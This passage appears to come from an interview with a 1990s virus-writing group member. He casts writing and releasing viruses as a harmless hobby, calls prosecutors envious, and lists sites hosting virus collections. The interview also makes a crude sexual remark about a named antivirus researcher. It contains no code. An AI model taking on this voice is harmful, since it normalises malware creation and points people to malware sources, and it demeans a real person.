in other to do other things, i'd rather choose Patty Hoffman, for masturbating in her tits, Vesselin Bontchev, in order to suggest him a new haircut, and Frans Veldman, for waking him up. Are there in Spain some laws against viruses and their author? There's just a law which forbids to modify/destruct any data, but there's nothing against writing self-reproducting code and/or releasing it, you're guilty only if you're the one who executes it intentionally.

What do you think 'bout maniacs who want to bust and prosecute us, the vx coders and would like to erase the vx scene ? I call that envy. They can't just understand that the word 'virus' doesn't imply 'destruction' necessarily, so they can't understand that many people enjoy themselves writing viruses, just as other people do when they paint pictures or watch TV. They'd probably like to know how to write viruses without having to use VCL, but their morality forbids them to have any kind of relationship or contact with people in the virus scene. Your plans 4 the future as coder and in general Just to release a lot of highly succesful 29A issues and to have more time to spend on doing the thing i like most: writing viruses. Never mind if they work under DOS, Windows, Windows95 or GameBoy, it's just to feel again the sensation of having written something really original and interesting to the rest of the people. Last but not least : can you point us to some interestin' online resources on the internet ? Well, i'm not very used to navigate through the Internet, but anyway i have some interesting addresses in my bookmark... WCIVR (Falcon's and Poltergeist's, the largest virus collection on the web) Greenline's homepage, full of pretty interesting links Cicatrix's homepage (check it out!) Roadkill's Caf=82 (by Jack the Ripper). God@rky's virus heaven (probably the most complete) Btw, pay attention at the major changes and surprises which are gonna take place at the 29A's official website. ;) So thanks, Mr.Sandman. Was very nice you spending some time with this interview. It was nice to answer all your questions, best luck with your magazine! :)

Thanx a lot, dude...

Sign up to vote on this title
UsefulNot useful